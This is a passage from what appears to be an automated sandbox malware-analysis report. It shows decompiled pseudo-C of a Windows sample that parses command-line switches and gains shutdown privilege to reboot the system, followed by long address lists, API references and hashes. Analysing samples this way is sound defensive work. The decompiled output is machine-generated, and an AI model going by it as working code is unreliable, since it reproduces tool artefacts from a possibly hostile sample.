                                                                                                                                                                                                        																								 *0xe89a2c =  *0xe89a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xe88d48 =  *0xe88d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xe89a2c =  *0xe89a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xe88a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xe89a2c = 3;
                                                                                                                                                                                                        																	 *0xe88a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xe88a2c != 0 &&  *0xe88b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xe89a3c, 0xe88b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E00E866C8(0xe88b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x00e85c9e
                                                                                                                                                                                                        0x00e85ca9
                                                                                                                                                                                                        0x00e85cb0
                                                                                                                                                                                                        0x00e85cb3
                                                                                                                                                                                                        0x00e85cb6
                                                                                                                                                                                                        0x00e85cb7
                                                                                                                                                                                                        0x00e85cb8
                                                                                                                                                                                                        0x00e85cbd
                                                                                                                                                                                                        0x00e86204
                                                                                                                                                                                                        0x00e85ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85ccb
                                                                                                                                                                                                        0x00e85cd3
                                                                                                                                                                                                        0x00e85cd7
                                                                                                                                                                                                        0x00e85cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85cf4
                                                                                                                                                                                                        0x00e85cf8
                                                                                                                                                                                                        0x00e85d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d06
                                                                                                                                                                                                        0x00e85d06
                                                                                                                                                                                                        0x00e85d0e
                                                                                                                                                                                                        0x00e85d10
                                                                                                                                                                                                        0x00e85d12
                                                                                                                                                                                                        0x00e85d14
                                                                                                                                                                                                        0x00e85d15
                                                                                                                                                                                                        0x00e85d17
                                                                                                                                                                                                        0x00e85d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d19
                                                                                                                                                                                                        0x00e85d19
                                                                                                                                                                                                        0x00e85d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d3f
                                                                                                                                                                                                        0x00e85d3f
                                                                                                                                                                                                        0x00e85d4b
                                                                                                                                                                                                        0x00e85d4b
                                                                                                                                                                                                        0x00e85d4f
                                                                                                                                                                                                        0x00e85d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d93
                                                                                                                                                                                                        0x00e85d93
                                                                                                                                                                                                        0x00e85d9a
                                                                                                                                                                                                        0x00e85d9d
                                                                                                                                                                                                        0x00e85d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d9e
                                                                                                                                                                                                        0x00e85d51
                                                                                                                                                                                                        0x00e85d5b
                                                                                                                                                                                                        0x00e85d72
                                                                                                                                                                                                        0x00e860fb
                                                                                                                                                                                                        0x00e860fb
                                                                                                                                                                                                        0x00e86207
                                                                                                                                                                                                        0x00e8620a
                                                                                                                                                                                                        0x00e8620b
                                                                                                                                                                                                        0x00e8620e
                                                                                                                                                                                                        0x00e86217
                                                                                                                                                                                                        0x00e85d78
                                                                                                                                                                                                        0x00e85d78
                                                                                                                                                                                                        0x00e85d80
                                                                                                                                                                                                        0x00e85d83
                                                                                                                                                                                                        0x00e85d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d84
                                                                                                                                                                                                        0x00e85d5d
                                                                                                                                                                                                        0x00e85d5f
                                                                                                                                                                                                        0x00e85d62
                                                                                                                                                                                                        0x00e85d68
                                                                                                                                                                                                        0x00e85d64
                                                                                                                                                                                                        0x00e85d64
                                                                                                                                                                                                        0x00e85d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d62
                                                                                                                                                                                                        0x00e85d5b
                                                                                                                                                                                                        0x00e85d4f
                                                                                                                                                                                                        0x00e85d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d9f
                                                                                                                                                                                                        0x00e85d9f
                                                                                                                                                                                                        0x00e85da5
                                                                                                                                                                                                        0x00e85dab
                                                                                                                                                                                                        0x00e85dba
                                                                                                                                                                                                        0x00e86218
                                                                                                                                                                                                        0x00e8621d
                                                                                                                                                                                                        0x00e86220
                                                                                                                                                                                                        0x00e86221
                                                                                                                                                                                                        0x00e86229
                                                                                                                                                                                                        0x00e86230
                                                                                                                                                                                                        0x00e86247
                                                                                                                                                                                                        0x00e8626a
                                                                                                                                                                                                        0x00e86272
                                                                                                                                                                                                        0x00e86249
                                                                                                                                                                                                        0x00e86255
                                                                                                                                                                                                        0x00e8625f
                                                                                                                                                                                                        0x00e86264
                                                                                                                                                                                                        0x00e86264
                                                                                                                                                                                                        0x00e86284
                                                                                                                                                                                                        0x00e85dc0
                                                                                                                                                                                                        0x00e85dc0
                                                                                                                                                                                                        0x00e85dca
                                                                                                                                                                                                        0x00e85e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85dcc
                                                                                                                                                                                                        0x00e85dce
                                                                                                                                                                                                        0x00e85e24
                                                                                                                                                                                                        0x00e85e24
                                                                                                                                                                                                        0x00e85e2c
                                                                                                                                                                                                        0x00e85e47
                                                                                                                                                                                                        0x00e85e4a
                                                                                                                                                                                                        0x00e861d2
                                                                                                                                                                                                        0x00e861e2
                                                                                                                                                                                                        0x00e861e7
                                                                                                                                                                                                        0x00e861ee
                                                                                                                                                                                                        0x00e861f1
                                                                                                                                                                                                        0x00e861f1
                                                                                                                                                                                                        0x00e861f8
                                                                                                                                                                                                        0x00e861f8
                                                                                                                                                                                                        0x00e85e50
                                                                                                                                                                                                        0x00e85e53
                                                                                                                                                                                                        0x00e86109
                                                                                                                                                                                                        0x00e8611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86125
                                                                                                                                                                                                        0x00e86137
                                                                                                                                                                                                        0x00e8613a
                                                                                                                                                                                                        0x00e8613c
                                                                                                                                                                                                        0x00e8613e
                                                                                                                                                                                                        0x00e8613e
                                                                                                                                                                                                        0x00e86141
                                                                                                                                                                                                        0x00e86141
                                                                                                                                                                                                        0x00e86143
                                                                                                                                                                                                        0x00e86144
                                                                                                                                                                                                        0x00e8614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86150
                                                                                                                                                                                                        0x00e86152
                                                                                                                                                                                                        0x00e8615c
                                                                                                                                                                                                        0x00e86170
                                                                                                                                                                                                        0x00e86172
                                                                                                                                                                                                        0x00e8617c
                                                                                                                                                                                                        0x00e86190
                                                                                                                                                                                                        0x00e86190
                                                                                                                                                                                                        0x00e86196
                                                                                                                                                                                                        0x00e861a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e861ab
                                                                                                                                                                                                        0x00e861b9
                                                                                                                                                                                                        0x00e861c6
                                                                                                                                                                                                        0x00e861c6
                                                                                                                                                                                                        0x00e8617e
                                                                                                                                                                                                        0x00e86180
                                                                                                                                                                                                        0x00e8618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8618a
                                                                                                                                                                                                        0x00e8615e
                                                                                                                                                                                                        0x00e86160
                                                                                                                                                                                                        0x00e8616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8616a
                                                                                                                                                                                                        0x00e8615c
                                                                                                                                                                                                        0x00e8614a
                                                                                                                                                                                                        0x00e8610b
                                                                                                                                                                                                        0x00e8610e
                                                                                                                                                                                                        0x00e8610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e59
                                                                                                                                                                                                        0x00e85e59
                                                                                                                                                                                                        0x00e85e5c
                                                                                                                                                                                                        0x00e8604f
                                                                                                                                                                                                        0x00e86056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8605c
                                                                                                                                                                                                        0x00e8606e
                                                                                                                                                                                                        0x00e86071
                                                                                                                                                                                                        0x00e86073
                                                                                                                                                                                                        0x00e86075
                                                                                                                                                                                                        0x00e86075
                                                                                                                                                                                                        0x00e86078
                                                                                                                                                                                                        0x00e86078
                                                                                                                                                                                                        0x00e8607a
                                                                                                                                                                                                        0x00e8607b
                                                                                                                                                                                                        0x00e86081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86087
                                                                                                                                                                                                        0x00e86087
                                                                                                                                                                                                        0x00e8608d
                                                                                                                                                                                                        0x00e8609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e860a2
                                                                                                                                                                                                        0x00e860aa
                                                                                                                                                                                                        0x00e860b2
                                                                                                                                                                                                        0x00e860b7
                                                                                                                                                                                                        0x00e860bd
                                                                                                                                                                                                        0x00e860bf
                                                                                                                                                                                                        0x00e860bf
                                                                                                                                                                                                        0x00e860d6
                                                                                                                                                                                                        0x00e860e0
                                                                                                                                                                                                        0x00e860e7
                                                                                                                                                                                                        0x00e860f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e860f5
                                                                                                                                                                                                        0x00e8609c
                                                                                                                                                                                                        0x00e86081
                                                                                                                                                                                                        0x00e85e62
                                                                                                                                                                                                        0x00e85e62
                                                                                                                                                                                                        0x00e85e65
                                                                                                                                                                                                        0x00e85fd3
                                                                                                                                                                                                        0x00e85fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fef
                                                                                                                                                                                                        0x00e85fef
                                                                                                                                                                                                        0x00e85ff7
                                                                                                                                                                                                        0x00e85ffd
                                                                                                                                                                                                        0x00e86003
                                                                                                                                                                                                        0x00e86006
                                                                                                                                                                                                        0x00e86011
                                                                                                                                                                                                        0x00e86014
                                                                                                                                                                                                        0x00e8603d
                                                                                                                                                                                                        0x00e86016
                                                                                                                                                                                                        0x00e86018
                                                                                                                                                                                                        0x00e86019
                                                                                                                                                                                                        0x00e8601b
                                                                                                                                                                                                        0x00e86033
                                                                                                                                                                                                        0x00e8601d
                                                                                                                                                                                                        0x00e86020
                                                                                                                                                                                                        0x00e86029
                                                                                                                                                                                                        0x00e86022
                                                                                                                                                                                                        0x00e86022
                                                                                                                                                                                                        0x00e86022
                                                                                                                                                                                                        0x00e86020
                                                                                                                                                                                                        0x00e8601b
                                                                                                                                                                                                        0x00e86042
                                                                                                                                                                                                        0x00e86044
                                                                                                                                                                                                        0x00e86046
                                                                                                                                                                                                        0x00e8604a
                                                                                                                                                                                                        0x00e85ff7
                                                                                                                                                                                                        0x00e85fd5
                                                                                                                                                                                                        0x00e85fd8
                                                                                                                                                                                                        0x00e85fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e6b
                                                                                                                                                                                                        0x00e85e6b
                                                                                                                                                                                                        0x00e85e6e
                                                                                                                                                                                                        0x00e85f8b
                                                                                                                                                                                                        0x00e85f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85f9f
                                                                                                                                                                                                        0x00e85fa7
                                                                                                                                                                                                        0x00e85faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fb1
                                                                                                                                                                                                        0x00e85fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fb5
                                                                                                                                                                                                        0x00e85fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fb9
                                                                                                                                                                                                        0x00e85fb7
                                                                                                                                                                                                        0x00e85fb3
                                                                                                                                                                                                        0x00e85faf
                                                                                                                                                                                                        0x00e85f8d
                                                                                                                                                                                                        0x00e85f8d
                                                                                                                                                                                                        0x00e85f8d
                                                                                                                                                                                                        0x00e85f8f
                                                                                                                                                                                                        0x00e85fc1
                                                                                                                                                                                                        0x00e85fc1
                                                                                                                                                                                                        0x00e85fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e74
                                                                                                                                                                                                        0x00e85e74
                                                                                                                                                                                                        0x00e85e77
                                                                                                                                                                                                        0x00e85ea0
                                                                                                                                                                                                        0x00e85ebd
                                                                                                                                                                                                        0x00e85f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85f7f
                                                                                                                                                                                                        0x00e85ec3
                                                                                                                                                                                                        0x00e85ec3
                                                                                                                                                                                                        0x00e85ecc
                                                                                                                                                                                                        0x00e85ed4
                                                                                                                                                                                                        0x00e85ed6
                                                                                                                                                                                                        0x00e85edc
                                                                                                                                                                                                        0x00e85edf
                                                                                                                                                                                                        0x00e85eea
                                                                                                                                                                                                        0x00e85eed
                                                                                                                                                                                                        0x00e85f3f
                                                                                                                                                                                                        0x00e85f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85eef
                                                                                                                                                                                                        0x00e85eef
                                                                                                                                                                                                        0x00e85ef2
                                                                                                                                                                                                        0x00e85f34
                                                                                                                                                                                                        0x00e85ef4
                                                                                                                                                                                                        0x00e85ef4
                                                                                                                                                                                                        0x00e85ef7
                                                                                                                                                                                                        0x00e85f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85ef9
                                                                                                                                                                                                        0x00e85ef9
                                                                                                                                                                                                        0x00e85efc
                                                                                                                                                                                                        0x00e85f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85efe
                                                                                                                                                                                                        0x00e85eff
                                                                                                                                                                                                        0x00e85f02
                                                                                                                                                                                                        0x00e85f16
                                                                                                                                                                                                        0x00e85f04
                                                                                                                                                                                                        0x00e85f07
                                                                                                                                                                                                        0x00e85f0d
                                                                                                                                                                                                        0x00e85f46
                                                                                                                                                                                                        0x00e85f46
                                                                                                                                                                                                        0x00e85f09
                                                                                                                                                                                                        0x00e85f09
                                                                                                                                                                                                        0x00e85f09
                                                                                                                                                                                                        0x00e85f07
                                                                                                                                                                                                        0x00e85f02
                                                                                                                                                                                                        0x00e85efc
                                                                                                                                                                                                        0x00e85ef7
                                                                                                                                                                                                        0x00e85ef2
                                                                                                                                                                                                        0x00e85f4c
                                                                                                                                                                                                        0x00e85f4e
                                                                                                                                                                                                        0x00e85f50
                                                                                                                                                                                                        0x00e85f54
                                                                                                                                                                                                        0x00e85ed4
                                                                                                                                                                                                        0x00e85ea2
                                                                                                                                                                                                        0x00e85ea4
                                                                                                                                                                                                        0x00e85eaf
                                                                                                                                                                                                        0x00e85eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e79
                                                                                                                                                                                                        0x00e85e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e83
                                                                                                                                                                                                        0x00e85e83
                                                                                                                                                                                                        0x00e85e83
                                                                                                                                                                                                        0x00e85e85
                                                                                                                                                                                                        0x00e85e85
                                                                                                                                                                                                        0x00e85e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e94
                                                                                                                                                                                                        0x00e85e8e
                                                                                                                                                                                                        0x00e85e7d
                                                                                                                                                                                                        0x00e85e77
                                                                                                                                                                                                        0x00e85e6e
                                                                                                                                                                                                        0x00e85e65
                                                                                                                                                                                                        0x00e85e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85dd0
                                                                                                                                                                                                        0x00e85dd0
                                                                                                                                                                                                        0x00e85dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85dd0
                                                                                                                                                                                                        0x00e85dce
                                                                                                                                                                                                        0x00e85dca
                                                                                                                                                                                                        0x00e85dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85d00
                                                                                                                                                                                                        0x00e85dd9
                                                                                                                                                                                                        0x00e85e04
                                                                                                                                                                                                        0x00e861fe
                                                                                                                                                                                                        0x00e85e0a
                                                                                                                                                                                                        0x00e85e0c
                                                                                                                                                                                                        0x00e85e17
                                                                                                                                                                                                        0x00e85e17
                                                                                                                                                                                                        0x00e85e04
                                                                                                                                                                                                        0x00e86200
                                                                                                                                                                                                        0x00e86200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00E85CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00E88B3E,00000104,00000000,?,?), ref: 00E85DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E85E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00E85EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00E85F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E85FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00E86008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E860AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00E81140,00000000,00000040,00000000), ref: 00E861F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00E861F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 6c4f826311729a978636fd27d3f3bf945fd3af270847a4caf7f11fe9e2e36429
                                                                                                                                                                                                        • Instruction ID: ede898b4140364962f68b2ea41bfef1feeb7008ad82d8a566a1bcc8e21750065
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c4f826311729a978636fd27d3f3bf945fd3af270847a4caf7f11fe9e2e36429
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3ED15C73A04A445EDF35BB398D487F67BA1A716308F5460EAC98EF6191DF708E868F01
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00E81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xe89a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00E844B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00E86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00E844B9(0, 0x522, 0xe81140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00E81EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00e81f90
                                                                                                                                                                                                        0x00e81f90
                                                                                                                                                                                                        0x00e81f93
                                                                                                                                                                                                        0x00e81f98
                                                                                                                                                                                                        0x00e81fa4
                                                                                                                                                                                                        0x00e81fa7
                                                                                                                                                                                                        0x00e81fc5
                                                                                                                                                                                                        0x00e81fcd
                                                                                                                                                                                                        0x00e81fdb
                                                                                                                                                                                                        0x00e81ee5
                                                                                                                                                                                                        0x00e81eea
                                                                                                                                                                                                        0x00e81ef1
                                                                                                                                                                                                        0x00e81ef4
                                                                                                                                                                                                        0x00e81f0c
                                                                                                                                                                                                        0x00e81f2e
                                                                                                                                                                                                        0x00e81f3a
                                                                                                                                                                                                        0x00e81f46
                                                                                                                                                                                                        0x00e81f4d
                                                                                                                                                                                                        0x00e81f58
                                                                                                                                                                                                        0x00e81f60
                                                                                                                                                                                                        0x00e81f61
                                                                                                                                                                                                        0x00e81f62
                                                                                                                                                                                                        0x00e81f75
                                                                                                                                                                                                        0x00e81f80
                                                                                                                                                                                                        0x00e81f77
                                                                                                                                                                                                        0x00e81f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81f77
                                                                                                                                                                                                        0x00e81f64
                                                                                                                                                                                                        0x00e81f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81f64
                                                                                                                                                                                                        0x00e81f0e
                                                                                                                                                                                                        0x00e81f0e
                                                                                                                                                                                                        0x00e81f13
                                                                                                                                                                                                        0x00e81f13
                                                                                                                                                                                                        0x00e81f14
                                                                                                                                                                                                        0x00e81f14
                                                                                                                                                                                                        0x00e81f16
                                                                                                                                                                                                        0x00e81f17
                                                                                                                                                                                                        0x00e81f1a
                                                                                                                                                                                                        0x00e81f1f
                                                                                                                                                                                                        0x00e81f1f
                                                                                                                                                                                                        0x00e81f86
                                                                                                                                                                                                        0x00e81f8f
                                                                                                                                                                                                        0x00e81fcf
                                                                                                                                                                                                        0x00e81fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fd3
                                                                                                                                                                                                        0x00e81fa9
                                                                                                                                                                                                        0x00e81fb4
                                                                                                                                                                                                        0x00e81fbb
                                                                                                                                                                                                        0x00e81fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fc3
                                                                                                                                                                                                        0x00e81f9a
                                                                                                                                                                                                        0x00e81f9a
                                                                                                                                                                                                        0x00e81fa2
                                                                                                                                                                                                        0x00e81fd9
                                                                                                                                                                                                        0x00e81fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00E81EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E81F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00E81FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
